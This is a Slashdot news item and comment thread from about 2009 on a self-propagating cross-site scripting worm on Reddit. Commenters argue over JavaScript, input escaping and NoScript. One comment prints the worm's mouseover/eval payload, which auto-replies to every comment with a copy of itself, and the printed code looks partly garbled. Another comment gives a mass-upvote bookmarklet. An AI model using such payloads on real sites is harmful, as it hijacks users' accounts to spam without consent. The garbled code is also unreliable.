
Reddit Javascript Exploit Spreading Virally

CmdrTaco posted more than 4 years ago | from the hate-when-that-happens dept.

Security 239

Nithendil writes "guyhersh from reddit.com describes the situation (warning: title NSFW): Based on what I've seen today, here's what went down. Reddit user Empirical wrote javascript code where if you copied and pasted it into the address bar, you would instantly spam that comment by replying to all the comments on the page and submitting it. Later xssfinder posted a proof of concept where if you hovered over a link, it would automatically run a Javascript. He then got the brilliant idea to combine the two scripts together, tested it and it spread from there."


239 comments


Is this good news or bad? (4, Funny)

Anonymous Coward | more than 4 years ago | (#29564863)

I don't know. Sounds good !!

Re:Is this good news or bad? (0, Flamebait)

ArsenneLupin (766289) | more than 4 years ago | (#29564889)

It's good news.

Indeed, it will educate people to surf with javascript turned off, and it will hopefully educate webmasters to stop programming their sites in a way that requires javascript even for basic functionality.

Re:Is this good news or bad? (-1, Offtopic)

ArsenneLupin (766289) | more than 4 years ago | (#29564913)

Oh, and btw, congrats for the fisht psot! :-)

Re:Is this good news or bad? (5, Insightful)

pla (258480) | more than 4 years ago | (#29564915)

it will hopefully educate webmasters to stop programming their sites in a way that requires javascript even for basic functionality.

*cough*Slashdot*cough*

Re:Is this good news or bad? (1)

SanityInAnarchy (655584) | more than 4 years ago | (#29565023)

It seems to work without Javascript, though it's usually faster with the script.

Re:Is this good news or bad? (1)

schon (31600) | more than 4 years ago | (#29565651)

it's usually faster with the script.

Hi there - you must have just popped in from some alternate universe... did Michael Jackson die there too? Was he black?

In this universe, the speed with javascript is noticeably slower - in many cases it's so slow as to be unusable. I've tried it from both my home and work desktops (quad-core, 4 and 8GB of RAM respectively), and from my Netbook (EeePC 901). It's *always* slower with javascript enabled.

Re:Is this good news or bad? (3, Interesting)

SanityInAnarchy (655584) | more than 4 years ago | (#29566157)

Hi there - you must have just popped in from some alternate universe

Yep. It's called Google Chrome -- or, more accurately, the Chromium nightly. Javascript executes quickly, and I don't have to wait for an entire separate page to load. Additionally, if I have to wait, the "submit" button has a countdown timer.

And regardless of speed, it is convenient to have that much more context on the page. For example, right now, I can see your post and mine, and I can expand the parents if I need to. If I was replying from the main discussion, I could scroll up to see the whole discussion. Yes, I know about tabs, but even switching with keyboard shortcuts isn't as nice as being able to actually see a few posts of context as I type.

In this universe, the speed with javascript is noticeably slower - in many cases it's so slow as to be unusable.

Which browser?

Re:Is this good news or bad? (2, Informative)

corbettw (214229) | more than 4 years ago | (#29565063)

Slashdot doesn't require Javascript. If it's turned off, you get sent to the classic POST form of yesteryear.

Re:Is this good news or bad? (1)

mcgrew (92797) | more than 4 years ago | (#29565813)

<script id="before-content" type="text/javascript">
var pageload = {
        pagemark: '521513116996487867',
        before_content: (new Date).getTime()
};
function pageload_done( $, console, maybe ){
        pageload.after_readycode = (new Date).getTime();
        pageload.content_ready_time = pageload.content_ready - pageload.before_content;
        pageload.script_ready_time = pageload.after_readycode - pageload.content_ready;
        pageload.ready_time = pageload.after_readycode - pageload.before_content; // Only report 1% of cases.
        maybe || (Math.random()>0.01) || $.ajax({ data: {
                op: 'page_profile',
                pagemark: pageload.pagemark,
                dom: pageload.content_ready_time,
                js: pageload.script_ready_time
        } });
}
</script>

Well, that looks like useful javascript to me.

<link rel="stylesheet" rev="stylesheet" href="//c.fsdn.com/sd/idlecore-tidied.css?T_2_5_0_272c" media="screen">

But it looks like that stylesheet is overridden by this:

<!--[if IE 7]><link rel="stylesheet" type="text/css" media="screen" href="//c.fsdn.com/sd/ie7-idle.css?T_2_5_0_272c" /><![endif]-->
<!--[if lt IE 7]><link rel="stylesheet" type="text/css" media="screen" href="//c.fsdn.com/sd/ie6-idle.css?T_2_5_0_272c" /><![endif]-->
<!--[if gte IE 8]><link rel="stylesheet" type="text/css" media="screen" href="//c.fsdn.com/sd/ie8-idle.css?T_2_5_0_272c" /><![endif]-->

I'm glad I looked at the source -- it seems I might be able to disable idle code by disabling javascript. I'll have to give it a try.

But to the /. coders' credit, they don't do any stupid crap like having javascript links when a simple <a href="http://www.somerandomwebpage.url">Some random web page</a> would do.

Re:Is this good news or bad? (5, Insightful)

Anonymous Coward | more than 4 years ago | (#29564943)

No, it won't. The other 6 million javascript exploits didn't do that. What makes you think this one will?

Re:Is this good news or bad? (5, Insightful)

SanityInAnarchy (655584) | more than 4 years ago | (#29565013)

Just as exploits in the image processing components of web browsers will hopefully educate people to surf in Lynx? Or exploits in their HTML rendering will hopefully educate people to surf by piping wget through less?

This was not because of Javascript, nor is Javascript going away because of this.

Re:Is this good news or bad? (4, Insightful)

ultranova (717540) | more than 4 years ago | (#29565471)

Just as exploits in the image processing components of web browsers will hopefully educate people to surf in Lynx? Or exploits in their HTML rendering will hopefully educate people to surf by piping wget through less?

There's a huge difference in complexity between image/HTML renderer and Javascript. Image file formats and HTML pages are not Turing complete, while Javascript is. Consequently, the former are "safe" in that it's possible to prove that a particular implementation is free of exploits that would allow running arbitrary code, while Javascript by definition can never be; the whole point of Javascript is to allow arbitrary code execution, so the best you could ever prove is that the code never leaves the confines of the Web browser - but having a script post comments does not require that.

This was not because of Javascript, nor is Javascript going away because of this.

Yes, this was because of Javascript, but no, sadly it won't be going away.

Re:Is this good news or bad? (4, Insightful)

Idiomatick (976696) | more than 4 years ago | (#29565735)

This isn't a lesson about javascript. It is a lesson we should have learned from Bobby Tables a long time ago. This shouldn't have been possible regardless of javascript.

For those not in the know: http://xkcd.com/327/ [xkcd.com]

Re:Is this good news or bad? (0)

Anonymous Coward | more than 4 years ago | (#29566099)

It is a lesson we should have learned from Bobby Tables a long time ago.

Yes, damnit. And there's more types of injection [zuavra.net] out there than just JS or SQL!

This subject resurfaces again and again on Slashdot and every time there's blame flying all over the place. It's very simple: escape the JavaScript! If you do it in a centralized manner for ALL the data you pass into HTML then you don't have to worry about isolated incidents.

Re:Is this good news or bad? (2, Insightful)

lysergic.acid (845423) | more than 4 years ago | (#29565793)

What exactly does being Turing complete have to do with it? If a scripting language weren't Turing complete, but had direct read/write access to your file system, would it be any safer than JS?

The problem with Reddit isn't JavaScript but rather their markdown implementation. And the security threat here isn't to the user whose system is running the JS, but instead to the Reddit site. If you're using an up-to-date & secure browser, there's typically minimal risk to enabling JavaScript. That JavaScript can sometimes be used to do mischievous things is a reason why site owners should not recklessly allow JavaScript to be posted by untrusted users—just as you wouldn't want to allow unfiltered HTML code to be posted by untrusted users.

If someone posts a link on a Slashdot, and that link eventually gets Slashdotted, then does that mean hyperlinks are inherently unsafe and need to be disabled, or just that some common sense precautions need to be taken when using them?

Re:Is this good news or bad? (1)

SanityInAnarchy (655584) | more than 4 years ago | (#29566105)

the former are "safe" in that it's possible to prove that a particular implementation is free of exploits that would allow running arbitrary code, while Javascript by definition can never be

You don't think it's possible to formally prove a sandbox? Or you only think it's possible to formally prove a sandbox that's not Turing-complete?

Re:Is this good news or bad? (1)

sexconker (1179573) | more than 4 years ago | (#29566413)

In theory you can prove a sandbox is secure.
The actual code for its implementation? Nope.

Also, I've never seen a sandbox without sand all around outside of it. It's a terrible name, though apt, as there are indeed exploits for sandboxes, and as they become more popular, more exploits will follow.

The sand must flow, or some such.

Re:Is this good news or bad? (0)

Anonymous Coward | more than 4 years ago | (#29565081)

Indeed, it will educate people to surf with javascript turned off, and it will hopefully educate webmasters to stop programming their sites in a way that requires javascript even for basic functionality.

That's what some of us have been saying since Netscape first spawned a pop-up ad, some 15 years ago.

The only response (Netscape 3 vs. Netscape 4, and all versions of IE until IE7.) was to bury the "Disable Javascript" option a little bit deeper into the menus.

It wasn't until PrefBar [mozdev.org] came out that I got the single-click togglability for Javashit and Flash that I'd wanted for 15 years.

Re:Is this good news or bad? (0)

Anonymous Coward | more than 4 years ago | (#29565135)

I just want to remind you that the latest frenzy in most of the mainstream browsers is blazing javascript speed, boasting about it and improving it with each release... so these kinds of exploits spread even faster.

Re:Is this good news or bad? (1)

Nicolay77 (258497) | more than 4 years ago | (#29565513)

It has Pavlov-reinforced in me the idea that Opera is safer than other browsers.

Re:Is this good news or bad? (3, Insightful)

not already in use (972294) | more than 4 years ago | (#29565693)

It's 2009. We should be able to use the internet the way it is intended, with javascript. Javascript isn't the problem, poor programming on reddit's behalf is the problem.

Re:Is this good news or bad? (1)

avatar_charlie (1633965) | more than 4 years ago | (#29565743)

That'll be the day. You could kiss gmail and all the photo-upload sites goodbye immediately, as well as a TON of other sites....and as noted below, this site as well.

This issue serves to raise some legitimate concerns, but it should not be used to further an ideological "anything other than HTML/CSS is bad" mentality. And with all the interests arrayed against such a mentality, it wouldn't happen in any case.

The average user isn't going to associate the words "javascript exploit" with "Oh, I need to change settings in my browser". Even the user base of reddit, tech oriented as it is, isn't going to change basic settings and habits to avoid such a problem. Instead, Reddit will patch its hole, and everyone will get on with their day.

Case in point, I'm simply going to avoid Reddit for the rest of the day. Simple problem, simpler cure....

ironic javascript fail (1, Informative)

Anonymous Coward | more than 4 years ago | (#29565883)

Incidentally, I went to mod this and it failed... multiple times.

Though it eventually worked, I am not impressed.

It seems that Slashdot is so horribly broken and inconsistent as to be immune to such exploits.

Re:ironic mod fail (1)

quercus.aeternam (1174283) | more than 4 years ago | (#29565919)

Speaking of irony...

(I confess, it was me)

Re:Is this good news or bad? (1)

Lord Bitman (95493) | more than 4 years ago | (#29565941)

Okay, you go design a standard which can achieve "basic functionality" without javascript, and then we'll talk.
Oh right, that standard was "HTML Frames", and those were near-universally despised.

Re:Is this good news or bad? (1)

insertwackynamehere (891357) | more than 4 years ago | (#29566379)

hey 2001 called they want their rhetoric back

Liar liar (-1, Troll)

Anonymous Coward | more than 4 years ago | (#29564885)

pants on Fire... fox.

Well, that site has a terrible design (-1, Troll)

BadAnalogyGuy (945258) | more than 4 years ago | (#29564901)

I won't hold Slashdot up as some paragon of website design, but that reddit site really leaves a lot to be desired.

Is this really a concern? Can a site with such a terrible look and feel really have so many users? WTF is reddit anyway?

Re:Well, that site has a terrible design (1)

jDeepbeep (913892) | more than 4 years ago | (#29564933)

WTF is reddit anyway?

Interestingly enough, the stories that end up on /. are not infrequently posted several days earlier on Reddit.

Re:Well, that site has a terrible design (2)

Tei (520358) | more than 4 years ago | (#29564997)

Well.. this one was posted before on reddit. *laughs*

So.. yea.

Can anyone post the Javascript code here? It's probably some boring use of ajax, but anyway...

Re:Well, that site has a terrible design (1)

ais523 (1172701) | more than 4 years ago | (#29565415)

No, Reddit got this story first. You'll notice that the links in the summary go to Reddit...

Re:Well, that site has a terrible design (1)

Neoncow (802085) | more than 4 years ago | (#29566005)

Almost as soon as people realized there was something strange going on, the programming subreddit started discussing the code.

http://www.reddit.com/r/programming/comments/9oobq/someone_put_a_malicious_java_script_comment_on_at/ [reddit.com]

http://www.reddit.com/r/programming/comments/9oo8j/source_code_for_the_redditfirefox_exploit/ [reddit.com]

Re:Well, that site has a terrible design (4, Informative)

aoni782 (1075319) | more than 4 years ago | (#29566359)

The script:

z="[x][b]\n[b]:/["+this.innerHTML+"](/onmouseover=eval(unescape(this.innerHTML9371d7a2e3ae86a00aab4771e39d255d9371d7a2e3ae86a00aab4771e39d255d//)";o=document;e=o.getElementsByTagName('a');for(i=0;i<e.length;i++)if (e[i].innerHTML=='reply')$(e[i]).click();o=document;e=o.getElementsByTagName('tez="[x][b]\n[b]:/["+this.innerHTML+"](/onmouseover=eval(unescape(this.innerHTML9371d7a2e3ae86a00aab4771e39d255d9371d7a2e3ae86a00aab4771e39d255d//)";o=document;e=o.getElementsByTagName('a');for(i=0;i<e.length;i++)if (e[i].innerHTML=='reply')$(e[i]).click();o=document;e=o.getElementsByTagName('textarea');for(i=0;i<e.length;i++)e[i].value=z;e=o.getElementsByTagName('button');for(i=0;i<e.length;i++)if (e[i].innerHTML=='save'&&e[i].style.display!='none')$(e[i]).click();"

Re:Well, that site has a terrible design (1, Troll)

mandark1967 (630856) | more than 4 years ago | (#29565005)

So it's like the Slashdot firehose, except people read it?

wow...

Re:Well, that site has a terrible design (1)

stoolpigeon (454276) | more than 4 years ago | (#29565213)

And the other way around quite often.

Re:Well, that site has a terrible design (1)

Conspiracy_Of_Doves (236787) | more than 4 years ago | (#29565293)

Yeah. I've been watching that Carl Sagan autotune video since last Thursday.

Re:Well, that site has a terrible design (2, Insightful)

Trahald (698493) | more than 4 years ago | (#29564993)

I'm a long time slashdotter and now spend equal time on reddit. What draws me to reddit is the spartan interface. Of course, the content on reddit is halfway between slashdot's and digg's, so I (unfortunately) have to keep coming back.

Re:Well, that site has a terrible design (1)

RingDev (879105) | more than 4 years ago | (#29565613)

Come for the stories. Stay for the comments!

-Rick

Re:Well, that site has a terrible design (2, Insightful)

jmnugent (705421) | more than 4 years ago | (#29565241)

Over the years I've also spent quite a bit of time on social sites like Slashdot, Fark, Metafilter, Digg, etc.... but now spend the majority of my time on Reddit. I actually like the design (it's simple, efficient and useful). But the beauty of Reddit is the organized structure of the sub-reddits. If I'm short for time, I can just quickly browse the frontpage. If I have more time, I can browse my favorite sub-reddits where people know me. The commenting system is easy on the eyes and easy to follow, and the userbase is a nice balance of attitudes.

proof of concept (2, Insightful)

yincrash (854885) | more than 4 years ago | (#29564907)

seriously. using the 'onhover' event is considered inventive enough to call it a proof of concept?

Re:proof of concept (4, Informative)

immortalpob (847008) | more than 4 years ago | (#29564995)

This is a flaw in Reddit's comment system, that allows the poster to get javascript code executed. A comment system should not allow you to use "onhover" that is the point.

Re:proof of concept (1)

Otto (17870) | more than 4 years ago | (#29565263)

A comment system should not allow you to insert javascript code of any kind, period. How exactly did he slip this past the filters? Does reddit even have filters?

Regardless, I've added reddit.com to my blocklist. Simple immunity. :)

Re:proof of concept (1)

maxume (22995) | more than 4 years ago | (#29565451)

What exactly are you worried about? The worst thing that could happen is that reddit did a poor job of closing the hole (the nasty comment has stopped spreading and is being mass deleted...) and someone could post some JS that tries to access some information of yours on another site, but the only way they will succeed is if the server side implementation of that other site is terribly flawed.

Re:proof of concept (1, Interesting)

Anonymous Coward | more than 4 years ago | (#29566251)

The implications of XSS vulnerabilities are much greater than you describe. Read this White paper, [virtualforge.de] particularly pages 19-27 to see the implications.

Give me an unfixed XSS vulnerability on a trusted site with top secret archives of sensitive material [xssed.org] and I can show you all sorts of mischief, including retrieval of the secret archive, administrator impersonation, password theft, phishing, page defacing, and much more. The opportunities are endless. I've seen this in recent legal documentation.

I can think of all sorts of exploits that would be specific to Reddit that could steal valuable information. I won't outline them here, as some jackass will go do them.

html tag to disable active content (4, Insightful)

TheLink (130905) | more than 4 years ago | (#29565569)

Years ago I actually proposed to the W3C and the mozilla bunch to add a tag to disable dynamic stuff like javascript.

Basically it would work something like this:

<shield lock="some_random_hard_to_guess_string_here" enabled="basic_html_only">
The browser will only recognize basic HTML stuff here, it won't recognize javascript or any _future_ dynamic stuff that the W3C or browser people think of
</shield unlock="some_random_hard_to_guess_string_here">

The some_random_hard_to_guess_string_here would be different for each page.

The idea is while the website should still have filters, even if in the future the W3C or browser wiseguys create some new fangled way of inserting javascript or some other dynamic content that the filters do not protect against (since it's new and the filters have not been updated), the browser will just ignore the new stuff that some hacker inserts when it's between the tags.

To me the current state of things is a bit crazy - basically it's like having a car with 1000 gas pedals (tags) and to stop the car you have to make sure all 1000 pedals are not pressed (escaped or filtered). There is not a single brake pedal! And worse, the W3C or MS or Mozilla or whoever could introduce a new gas pedal, and you the website operator have to filter out the new gas pedal when it's introduced.

With something like this tag there is a brake pedal, so even if you don't manage to filter out all the 1000 gas pedals, the brake helps to keep stuff safe.

If they had implemented such a tag, the google and myspace worms would not have worked for so many browsers.

FWIW, these sort of worms are not new. I managed to find a hole in advogato some years ago (iframe worm) - and hence my suggestion to the W3C and Mozilla.

But it seems to me that NONE of them are really interested in improving security. They're all just interested in inventing new gas pedals for people (and hackers) to step on. They're not even interested in creating a single brake pedal. They just pay lip service to security.

See the thing is - it's not too difficult to code a browser to go "OK from now on there's no such thing as javascript till I see a valid unlock tag", so even if there is a browser parsing bug and a hacker manages to insert javascript via a stupid browser bug (that the website filters naturally do not and cannot cater for) it does NOT matter - since javascript will be disabled - between those tags the browser will be respecting the flag that says "I do not know javascript, java and all that fancy stuff" - it does not even have to parse javascript - since for all intents and purposes between those tags, the browser does not know there's such a thing as javascript (or activex or flash etc).

This is very useful for sites that have to include 3rd party content - sites like slashdot or webmail sites or even sites that serve up ads from 3rd parties.

Re:html tag to disable active content (0)

Anonymous Coward | more than 4 years ago | (#29565841)

M0d par3nt u!P Smart way of dealing with a dumb problem - just generate a 128bit nonce for the tag on the server side, problem solved.

Re:html tag to disable active content (0)

Anonymous Coward | more than 4 years ago | (#29566037)

I don't really see how this would work. First of all, you say that websites should implement filters anyways, but if they have this tool, many will think they don't need to.

Then the web will be an even more dangerous place for browsers that don't implement this.

It really isn't all that hard to filter HTML. I don't think any standard has yet been introduced nor will be that does not use standard tags with angle brackets. So all your filter has to do is remove these tags. If you really want your users to be able to post content with tags, then *whitelist* tags and attributes, but at your own peril.

Re:html tag to disable active content (1)

sukotto (122876) | more than 4 years ago | (#29566185)

So then people would first have to paste a comment "" and THEN paste the comment with the exploit code?

Re:html tag to disable active content (1)

harry666t (1062422) | more than 4 years ago | (#29566195)

You can't assign attributes to end tags. XML/HTML won't let you do that and extending it to be able to do so would be a bit of a revolution. Too many existing parsers rely on the current behaviour. But maybe you could possibly do something along '''<startshield key="lalala" /> stuff <endshield key="lalala" />''', although I believe that'd also be a bit of a hack.

What we actually really need, and what is the real solution, is just a little more careful programming on the server side. Write a function that takes a string as an input and produces an escaped string as an output. Prove mathematically that no input shall ever produce broken output. Simple.

Re:html tag to disable active content (4, Insightful)

Timmmm (636430) | more than 4 years ago | (#29566317)

Well that's an overly complicated and... well *wrong* way to do it. The correct solution is:

1. Escape all <'s and >'s and &'s in the input.
2. Interpret BB-code to add links & basic formatting.

Simple.
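An added server-side example (not reddit's code, and not code from anyone in this thread) of the escape-then-interpret approach Timmmm describes, combined with the single escaping function harry666t asks for: the whole input is escaped first, only balanced [b]/[i]/[url] pairs are turned into HTML afterwards, and link targets are whitelisted by shape so a target like the worm's `/onmouseover=...` lands inert inside a quoted attribute. The BB-code tag set, the URL rules and the function names are assumptions made for this illustration.

```python
import html
import re
from typing import Optional

# Constructed example: a comment renderer that escapes first and interprets a
# tiny BB-code subset afterwards. The tag names, the URL rules and the function
# names are assumptions made for this illustration, not any real site's parser.

# The only markup this renderer ever emits; used to check the output invariant.
_ALLOWED_OUTPUT = re.compile(
    r'</?(?:strong|em)>|<a href="[^"<>]*" rel="nofollow">|</a>'
)


def escape_html(text: str) -> str:
    # Step 1: < > & " and ' all become entities, so nothing the user typed can
    # open a tag or break out of a quoted attribute value later on.
    return html.escape(text, quote=True)


def safe_href(raw: str) -> Optional[str]:
    # Link targets are whitelisted by shape: absolute http(s) URLs or
    # site-relative paths only. javascript:, data:, protocol-relative //host
    # and anything containing whitespace or control characters is rejected.
    candidate = raw.strip()
    if re.match(r"^(?:https?://|/(?!/))", candidate, re.IGNORECASE) is None:
        return None
    if any(ch.isspace() or ord(ch) < 0x20 for ch in candidate):
        return None
    return candidate


def render_comment(text: str) -> str:
    # Step 2: interpret markup on the *escaped* text. Only balanced pairs are
    # converted; a stray [b] stays literal instead of bolding the rest of the page.
    out = escape_html(text)
    out = re.sub(r"\[b\](.*?)\[/b\]", r"<strong>\1</strong>", out, flags=re.DOTALL)
    out = re.sub(r"\[i\](.*?)\[/i\]", r"<em>\1</em>", out, flags=re.DOTALL)

    def link(m):
        # The target was escaped in step 1; validate the real string, then
        # re-escape it so it sits inside a quoted attribute whatever it holds.
        href = safe_href(html.unescape(m.group("href")))
        if href is None:
            return m.group("text")  # bad target: keep the text, drop the link
        return f'<a href="{escape_html(href)}" rel="nofollow">{m.group("text")}</a>'

    return re.sub(
        r"\[url=(?P<href>[^\]]+)\](?P<text>.*?)\[/url\]", link, out, flags=re.DOTALL
    )


def only_allowed_markup(rendered: str) -> bool:
    # The invariant the thread asks for: every '<' in the output was put there
    # by the renderer itself. Strip the tags we generate; none may remain.
    return "<" not in _ALLOWED_OUTPUT.sub("", rendered)
```

Because the interpreter only ever sees escaped text, a new attribute or tag invented by a browser vendor later cannot reach the page through this path; the link whitelist is the one place where user data becomes an attribute value, and it is quoted and escaped there.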

Re:proof of concept (2, Insightful)

MathFox (686808) | more than 4 years ago | (#29565009)

It is just a reminder to programmers of public forum software how important input sanitation is.

Apparently the damage was limited to only one site... But similar hacks could be done on other vulnerable sites.

Re:proof of concept (1)

pjt33 (739471) | more than 4 years ago | (#29565233)

Have been. Sun's fora spring to mind.

Re:proof of concept (1)

gzipped_tar (1151931) | more than 4 years ago | (#29565563)

Not just 'public forum software'. Every motherfucking kind of software.

NoScript (4, Insightful)

corychristison (951993) | more than 4 years ago | (#29564909)

"NoScript FTW!" comments commencing in 3... 2... 1...

I skimmed the FAQ on the first link, and it seems reddit is responsible for not scrubbing input.

Next!

Re:NoScript (3, Interesting)

CKW (409971) | more than 4 years ago | (#29564931)

I love how *their* mistake causes viral problems in YOUR browser. All one needs is some sort of cross site vulnerability now and ...

Re:NoScript (1)

AnotherShep (599837) | more than 4 years ago | (#29565215)

The obvious solution is that you need to get revenge. Go start a popular site for owners of popular sites so you can cause viral problems in THEIR browser.

Re:NoScript (1, Informative)

maxume (22995) | more than 4 years ago | (#29565281)

You seem to have misunderstood what is going on. There isn't really a 'viral problem' in the browser, there is (was) a comment that would cause your browser to spam the server with copies of itself. So the problem is described as viral because it spreads to new users as they hover over an infected comment, but the problem is pretty well localized to reddit.com, and browser security is in no way compromised.

Re:NoScript (0)

Anonymous Coward | more than 4 years ago | (#29566093)

There's something better than noscript: quickjava [mozilla.org] . Noscript works, but it's a pain because it insists on making exceptions to what I assumed meant "absolutely no javascript until I turn it on". I don't want to think about anything, I just want to be able to turn it off/on with a single click. It also requires several annoying clicks to disable/enable javascript.

Quickjava, on the other hand, is exactly what I envisioned when I wished I could turn javascript off/on with a single click. No questions asked, no surprises, either completely on or completely off.

Re:NoScript (4, Insightful)

RiotingPacifist (1228016) | more than 4 years ago | (#29566239)

Cue me reposting my views on noscript being a pretty crappy tool for modern web security then.

NoScript comes from a broken way of thinking, "you can identify attacking sites and trusted sites", the attack code for this was coming from reddit.com (a site you have to allow in order to use reddit). The only way this sort of bug can be protected against is by use of javascript filtering tools such as controldescripts [mozdev.org] that filter javascript request by type and domain, with such a tool it would be possible to protect yourself much more effectively.

mouseclick is submitting info -> allow
mouseover is requesting data -> allow
mouseover is submitting data -> request user confirmation
javascript function is doing something weird -> request user confirmation
javascript is trying to use a known exploit* -> deny and notify user (as a workaround for 0-days simply blocking the bad JS calls will protect users much faster than browsers usually get patched) ...etc

You could also combine this with domain checking to have lists of pages where you allow
*no-js (untrusted),
*simple-JS (google, youtube, etc) but [it might allow functionality but could prevent tracking],
*complex-js (facebook, etc) [all the ajax stuff means simple-JS wouldn't work]
*all-JS (fancynewsite.com) [even the complex list of functions you allow just isn't enough]

Such tools could also help the paranoid among us use websites that require JS, by disabling mousetracking and sending of data on non-click actions.

As long as people stick to the broken thinking of trusted/untrusted domains, there is little chance of this actually happening. The worst thing about noscript is that for an unknown site you often have to allow JS on it to see what it looks like, so unless you plan on only browsing sites you've already been to and those that don't use javascript, it is completely useless yet its users claim, nay genuinely think they are more secure!

White hat vs Black hat (1)

thepooh81 (1606041) | more than 4 years ago | (#29564921)

The guy who did this is clearly intelligent. Although I got hit with this yesterday all I could think about what how clever it was. Too bad he's not using his powers for good (unless you consider taking down reddit good).

What do you think stops black hats from converting? Easy money? Life outside the "norm"?

Re:White hat vs Black hat (3, Funny)

mcgrew (92797) | more than 4 years ago | (#29564991)

What do you think stops black hats from converting? Easy money? Life outside the "norm"?

Sociopathy, perhaps?

Re:White hat vs Black hat (1)

PalmKiller (174161) | more than 4 years ago | (#29565087)

I think you are confusing a hacker with a java script kiddie.

Re:White hat vs Black hat (1)

BlueKitties (1541613) | more than 4 years ago | (#29566303)

Agreed. There's a big difference between finding an exploit in a secure system and finding an exploit in a JavaScript driven page that wasn't scrubbed. Back in the golden days, 1337 H4x used to post specially crafted HTML into a comment/post like this, because the website didn't scrub the posts. It's like SQL injection, only with HTML tags. And in this case, it's JavaScript instead of HTML.

I remember on gamefaqs.com, users used to post italic/bold tags without closures, which caused the entire remainder of the page to end up in italics/bold. Of course, these "exploits" ended up being deemed hacks, when in fact it's more or less a stupid webpage.

bravery (1)

Necroloth (1512791) | more than 4 years ago | (#29564925)

So an article noting a working proof of concept of running a script by hovering over a link... and two links in the summary provided... is this the nerds russian roulette? :p

NSFW? (2)

mcgrew (92797) | more than 4 years ago | (#29564953)

guyhersh from reddit.com describes the situation (warning: title NSFW)

Does anybody have a SFW link? Something like this certainly must have more than one FA.

Re:NSFW? (1)

leuk_he (194174) | more than 4 years ago | (#29565073)

the faq "1) What the fuck?" might be considered NSFW?

or maybe some content that is displayed only when js is enabled, something that is not recommended on a page called javascript exploit.

Re:NSFW? (1)

mcgrew (92797) | more than 4 years ago | (#29565253)

Thanks, I guess I can RTFA. That's no less SFW than slashdot. I wonder why the warning?

Re:NSFW? (1)

sadness203 (1539377) | more than 4 years ago | (#29565437)

Because of the word fuck...
If someone loses his job on that particular title... he deserved a better job...
"OMG ... he's reading porn again ! I can see the word fuck everywhere on the server log, I must go tell the boss!"

Re:NSFW? (1)

bertoelcon (1557907) | more than 4 years ago | (#29565111)

It just says "what the fuck" in the title. Their work has to be really restrictive to have one word cause a problem.

Re:NSFW? (4, Funny)

BlackSabbath (118110) | more than 4 years ago | (#29565115)

> Eye owl wise ewes a spill chucker sew eye no my spilling is core wrecked.

Hey, whadda ya know? A sig with a New Zealand accent.

(Yeah, yeah, I know, offtopic, blah, blah, mod-away...)

Re:NSFW? (1)

pavon (30274) | more than 4 years ago | (#29565149)

The only thing NSFW about the link is that it says "What the fuck" in the title/url. So unless you have a really braindead tripwire at work it shouldn't be a problem.

Re:NSFW? (4, Funny)

Yvan256 (722131) | more than 4 years ago | (#29565231)

The only fucking thing NSFW about the link is that it fucking says "What the fuck" in the title. And if you can read my fucking comment, you can go ahead and fucking click that link.

And here's another "Fuck" just for the heck of it.

Warning: my comment was NSFW and should not have been read.

Re:NSFW? (4, Funny)

tehcyder (746570) | more than 4 years ago | (#29565597)

Warning! The above post is NSFW!

Re:NSFW? (4, Funny)

Anonymous Coward | more than 4 years ago | (#29565831)

FUCK!!!

Re:NSFW? (1)

jmorkel (952809) | more than 4 years ago | (#29565737)

I was expecting boobies in TFA. Leaving disappointed.

Re:NSFW? (1)

Rogerborg (306625) | more than 4 years ago | (#29565243)

It's OK, the link to the article already contains the "NSFW title", so you're damned already in the eyes of your sysadmin.

Reddit Hacks (3, Interesting)

jDeepbeep (913892) | more than 4 years ago | (#29565031)

This is nothing new. There is a quiet tradition of Reddit users finding the weak points of the site, like this [reddit.com] for example.

Putting javascript:$(".up").click()() in the address bar upvotes everything on the page.

Re:Reddit Hacks (1)

RalphSleigh (899929) | more than 4 years ago | (#29565713)

That's the user opting to execute extra javascript on your page; if this breaks your web site/application for more than that user then you are not doing it right. The posted hack is something much more fun.

Re:Reddit Hacks (4, Insightful)

Chris Pimlott (16212) | more than 4 years ago | (#29565857)

This is not a weakness or an exploit, it's simply a javascript bookmarklet. [wikipedia.org] You could make something like this for any site, such as Slashdot.

It's only an exploit if you can force other people to run that code without their consent.
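One defender-side check that follows from that distinction: a bookmarklet produces one action by one consenting user, while a self-propagating comment shows up as the same body posted by many different users across many threads within minutes. This added example (not part of the thread, and not reddit's code) flags such bursts in a constructed comment-submission log; the log format, the time window and the thresholds are assumptions:

```python
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed sample of a comment-submission log (not real reddit data):
# (timestamp, username, thread_id, comment_body)
SAMPLE_LOG = [
    ("2009-09-27 10:00:00", "alice", "t1", "thanks!"),
    ("2009-09-27 10:01:00", "bob",   "t1", "check this out"),
    ("2009-09-27 10:01:30", "carol", "t2", "check this out"),
    ("2009-09-27 10:02:00", "dave",  "t2", "check this out"),
    ("2009-09-27 10:02:30", "erin",  "t3", "check this out"),
    ("2009-09-27 10:03:00", "frank", "t1", "first!"),
    ("2009-09-27 10:03:10", "frank", "t2", "first!"),
    ("2009-09-27 10:03:20", "frank", "t3", "first!"),
    ("2009-09-27 13:00:00", "gina",  "t4", "thanks!"),
    ("2009-09-27 16:00:00", "hank",  "t5", "thanks!"),
]


def parse_log(rows):
    """Turn the string timestamps of the sample rows into datetime objects."""
    return [(datetime.strptime(ts, "%Y-%m-%d %H:%M:%S"), user, thread, body)
            for ts, user, thread, body in rows]


def worm_candidates(rows, window=timedelta(minutes=10), min_users=3, min_threads=2):
    """Return {body: (distinct_users, distinct_threads)} for comment bodies that
    were posted by at least `min_users` different accounts in at least
    `min_threads` threads inside any `window`-long interval.

    A single user repeating himself ("first!") or a common phrase spread over
    hours ("thanks!") does not qualify; a worm replying to every comment on
    every page its victims visit does.
    """
    by_body = defaultdict(list)
    for ts, user, thread, body in parse_log(rows):
        by_body[body.strip()].append((ts, user, thread))

    flagged = {}
    for body, events in by_body.items():
        events.sort()                      # chronological order
        best = (0, 0)
        for i, (start, _, _) in enumerate(events):
            users, threads = set(), set()
            for ts, user, thread in events[i:]:   # sliding window from event i
                if ts - start > window:
                    break
                users.add(user)
                threads.add(thread)
            if len(users) >= min_users and len(threads) >= min_threads:
                best = max(best, (len(users), len(threads)))
        if best != (0, 0):
            flagged[body] = best
    return flagged


if __name__ == "__main__":
    for body, (users, threads) in worm_candidates(SAMPLE_LOG).items():
        print(f"burst: {body!r} from {users} users in {threads} threads")
```

In practice the body would be normalised (or hashed after stripping markup) before grouping, so that trivial variations a worm might introduce still land in the same bucket; the thresholds here are deliberately low to suit the tiny constructed log.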

Re:Is this good news or bad? (2, Insightful)

